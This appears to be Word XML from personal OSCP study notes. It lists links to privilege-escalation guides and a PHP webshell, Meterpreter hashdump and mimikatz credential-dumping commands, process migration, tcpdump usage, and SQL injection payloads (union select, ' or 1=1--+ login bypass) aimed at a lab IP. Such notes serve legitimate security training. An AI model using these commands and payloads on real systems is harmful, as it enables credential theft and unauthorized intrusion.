    <w:p w14:paraId="1CF8DC6D" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39">
        <w:r w:rsidR="007351F7"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blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122CFAEC" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId40">
        <w:r w:rsidR="007351F7">
          <w:rPr>
            <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.fuzzysecurity.com/tutorials/16.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A2E17C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidR="007351F7"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pentest.blog/windows-privilege-escalation-methods-for-pentesters/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB14344" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId42">
        <w:r w:rsidR="007351F7">
          <w:rPr>
            <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://justpentest.blogspot.sg/2015/07/minishare1.4.1-bufferoverflow.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346E4CCA" w14:textId="558E46D0" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:anchor="!oscp-exam-guide.md">
        <w:r w:rsidR="007351F7">
          <w:rPr>
            <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://support.offensive-security.com/#!oscp-exam-guide.md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07636B9D" w14:textId="563512EC" w:rsidR="00067390" w:rsidRDefault="00067390" w:rsidP="00067390">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D23B8BB" w14:textId="77777777" w:rsidR="00067390" w:rsidRPr="00067390" w:rsidRDefault="00067390" w:rsidP="00067390">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA5EBC0" w14:textId="3A5D9BA7" w:rsidR="00067390" w:rsidRPr="00067390" w:rsidRDefault="00067390" w:rsidP="00067390">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067390">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F71AD" w14:textId="4E7DF071" w:rsidR="00BC0AE0" w:rsidRPr="00067390" w:rsidRDefault="00087892" w:rsidP="00067390">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidR="00067390" w:rsidRPr="00E36035">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/WhiteWinterWolf/wwwolf-php-webshell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="580FB1F9" w14:textId="77777777" w:rsidR="00F862AB" w:rsidRDefault="00F862AB" w:rsidP="00F862AB">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539DB90D" w14:textId="22C8BBC3" w:rsidR="007B6F3B" w:rsidRPr="007B6F3B" w:rsidRDefault="007B6F3B" w:rsidP="007B6F3B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc533025675"/>
      <w:r w:rsidRPr="007B6F3B">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Finding hashdump</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="09D7F339" w14:textId="77777777" w:rsidR="007B6F3B" w:rsidRPr="007B6F3B" w:rsidRDefault="007B6F3B" w:rsidP="007B6F3B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5151A3E1" w14:textId="77777777" w:rsidR="007B6F3B" w:rsidRPr="007B6F3B" w:rsidRDefault="007B6F3B" w:rsidP="007B6F3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B6F3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Meterpreter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4408C1E9" w14:textId="77777777" w:rsidR="007B6F3B" w:rsidRDefault="007B6F3B" w:rsidP="007B6F3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dump password hashes from the SAM database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F03D2F3" w14:textId="77777777" w:rsidR="007B6F3B" w:rsidRDefault="007B6F3B" w:rsidP="007B6F3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; use priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C07CCE" w14:textId="77777777" w:rsidR="007B6F3B" w:rsidRDefault="007B6F3B" w:rsidP="007B6F3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36247A71" w14:textId="22B081F4" w:rsidR="005B6963" w:rsidRDefault="007B6F3B" w:rsidP="007B6F3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; hashdump</w:t>
      </w:r>
      <w:r w:rsidRPr="007B6F3B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F603BD" w14:textId="7AB33E89" w:rsidR="00EB1D3E" w:rsidRDefault="00EB1D3E" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="5D1CE484" w14:textId="3298C97E" w:rsidR="00EB1D3E" w:rsidRPr="004C1FCB" w:rsidRDefault="00EB1D3E" w:rsidP="00EB1D3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hash-identifier (to find hash type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49730894" w14:textId="72E5B9F6" w:rsidR="00EB1D3E" w:rsidRDefault="00EB1D3E" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="721BF9C4" w14:textId="3649C785" w:rsidR="00B31CE3" w:rsidRDefault="00B31CE3" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="0DE34569" w14:textId="77777777" w:rsidR="00B07108" w:rsidRDefault="00B07108" w:rsidP="00B07108">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc533025676"/>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="62EA8856" w14:textId="77777777" w:rsidR="00B07108" w:rsidRPr="0087669F" w:rsidRDefault="00B07108" w:rsidP="00B07108"/>
    <w:p w14:paraId="5A7D381D" w14:textId="77777777" w:rsidR="00B07108" w:rsidRPr="00637CB1" w:rsidRDefault="00B07108" w:rsidP="00B07108">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637CB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>http://10.11.1.35/comment.php?id=738 order by 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DE8775" w14:textId="77777777" w:rsidR="00B07108" w:rsidRPr="00637CB1" w:rsidRDefault="00B07108" w:rsidP="00B07108">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637CB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">id=738 order by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>6--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF3B97" w14:textId="77777777" w:rsidR="00B07108" w:rsidRPr="00637CB1" w:rsidRDefault="00B07108" w:rsidP="00B07108">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>http://10.11.1.35/comment.php?id=738 union all select 1,2,3,4,5,6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55709CF9" w14:textId="0A2CBE68" w:rsidR="00B07108" w:rsidRDefault="00B07108" w:rsidP="00B31CE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr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d=738 union select 1,2,3,4,5,6—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8D534" w14:textId="3094BF03" w:rsidR="00B31CE3" w:rsidRPr="00957DEE" w:rsidRDefault="00B31CE3" w:rsidP="00B07108">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957DEE">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQL injection to login page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135ADCD7" w14:textId="1527F36A" w:rsidR="00B31CE3" w:rsidRPr="00B31CE3" w:rsidRDefault="005618DA" w:rsidP="00B07108">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005618DA">
        <w:t>' or 1=1--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477801C6" w14:textId="2A39C04F" w:rsidR="00B31CE3" w:rsidRDefault="00B31CE3" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="0493532C" w14:textId="678285F1" w:rsidR="00463DF1" w:rsidRDefault="00463DF1" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="15595C8C" w14:textId="20403337" w:rsidR="00463DF1" w:rsidRDefault="00463DF1" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="59F97BFA" w14:textId="1A752CA3" w:rsidR="00463DF1" w:rsidRDefault="00463DF1" w:rsidP="00463DF1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc533025677"/>
      <w:r w:rsidRPr="00463DF1">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>MSF</w:t>
      </w:r>
      <w:r w:rsidR="005D70E0">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Migrate)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="3D12ADED" w14:textId="71AEA343" w:rsidR="00463DF1" w:rsidRDefault="00463DF1" w:rsidP="00463DF1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Migrate</w:t>
      </w:r>
      <w:r w:rsidR="005D70E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1857E786" w14:textId="7C3C0305" w:rsidR="005D70E0" w:rsidRDefault="005D70E0" w:rsidP="005D70E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you type </w:t>
      </w:r>
      <w:r w:rsidR="00BB44DC">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B9509B">
        <w:t>getuid</w:t>
      </w:r>
      <w:r w:rsidR="00BB44DC">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and you are not </w:t>
      </w:r>
      <w:r w:rsidR="00BB44DC">
        <w:t>NT AUTHORITY\SYSTEM, you might have a bad token so type “ps” to migrate to a good system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254CC2CA" w14:textId="6D954CC6" w:rsidR="00010F4A" w:rsidRPr="00463DF1" w:rsidRDefault="00010F4A" w:rsidP="005D70E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Type migrate to the PID that are stable or more useful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D1A617" w14:textId="1A4C2358" w:rsidR="00463DF1" w:rsidRDefault="00463DF1" w:rsidP="00EB1D3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="223F2708" wp14:editId="5EF7E7BF">
            <wp:extent cx="5943600" cy="2480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B38B" w14:textId="4798DC21" w:rsidR="00B30042" w:rsidRDefault="00B30042" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="5825C26F" w14:textId="3BA10C91" w:rsidR="00B30042" w:rsidRDefault="00B30042" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="2C6BF443" w14:textId="44868329" w:rsidR="00B30042" w:rsidRDefault="00B30042" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="7762870B" w14:textId="19E3B852" w:rsidR="00B30042" w:rsidRDefault="00B30042" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="3932C16E" w14:textId="77777777" w:rsidR="00B6300E" w:rsidRDefault="00B30042" w:rsidP="00B6300E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc533025678"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>TCPDUMP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="4B7B961C" w14:textId="091B5518" w:rsidR="00B6300E" w:rsidRDefault="00B6300E" w:rsidP="00B6300E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6300E">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Capture Packets from Specific Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789C2F5D" w14:textId="30DE018F" w:rsidR="00B6300E" w:rsidRDefault="00B6300E" w:rsidP="00B6300E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Tcpdump -i eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2623ED" w14:textId="263CBC18" w:rsidR="00B6300E" w:rsidRPr="00B6300E" w:rsidRDefault="00B6300E" w:rsidP="00B6300E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6300E">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>only N number of Packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C3698B" w14:textId="55E35732" w:rsidR="00B6300E" w:rsidRPr="00C71D5A" w:rsidRDefault="00B6300E" w:rsidP="00C71D5A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Tcpdump -c 5 -i eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE97D3" w14:textId="5E2CDF8E" w:rsidR="00B6300E" w:rsidRDefault="00C71D5A" w:rsidP="00C71D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Display Available Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A893ECC" w14:textId="0327BBAC" w:rsidR="00C71D5A" w:rsidRPr="00C71D5A" w:rsidRDefault="00C71D5A" w:rsidP="00C71D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tcpdump -D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E151E9B" w14:textId="77777777" w:rsidR="00B30042" w:rsidRPr="00B30042" w:rsidRDefault="00B30042" w:rsidP="00B6300E"/>
    <w:p w14:paraId="52C71F98" w14:textId="30AE1282" w:rsidR="00B30042" w:rsidRDefault="00B30042" w:rsidP="00EB1D3E"/>
    <w:p w14:paraId="02B5D9FC" w14:textId="73531FD9" w:rsidR="00431638" w:rsidRPr="00431638" w:rsidRDefault="00431638" w:rsidP="00431638">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc533025679"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>PIVOTING</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="301A7264" w14:textId="73456FDD" w:rsidR="00431638" w:rsidRDefault="00087892" w:rsidP="00431638">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="00431638" w:rsidRPr="001C4AF8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.ivoidwarranties.tech/posts/pentesting-tuts/pivoting/pivoting-basics/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49E3B5DE" w14:textId="19FFDA5F" w:rsidR="00C63C23" w:rsidRDefault="00C63C23">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07693F5D" w14:textId="23B88D33" w:rsidR="00C63C23" w:rsidRPr="00C63C23" w:rsidRDefault="00C63C23" w:rsidP="00C63C23">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Getting windows password with meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA40F66" w14:textId="1DDA3A94" w:rsidR="00431638" w:rsidRDefault="00C63C23" w:rsidP="00EB1D3E">
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEFE670" w14:textId="7CAF1CB1" w:rsidR="00C63C23" w:rsidRDefault="00C63C23" w:rsidP="00C63C23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>load mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ECB712" w14:textId="08F899C2" w:rsidR="00C63C23" w:rsidRDefault="00C63C23" w:rsidP="00C63C23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>wdigest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442F4C31" w14:textId="48254BB8" w:rsidR="00545F77" w:rsidRDefault="00545F77" w:rsidP="00545F77"/>
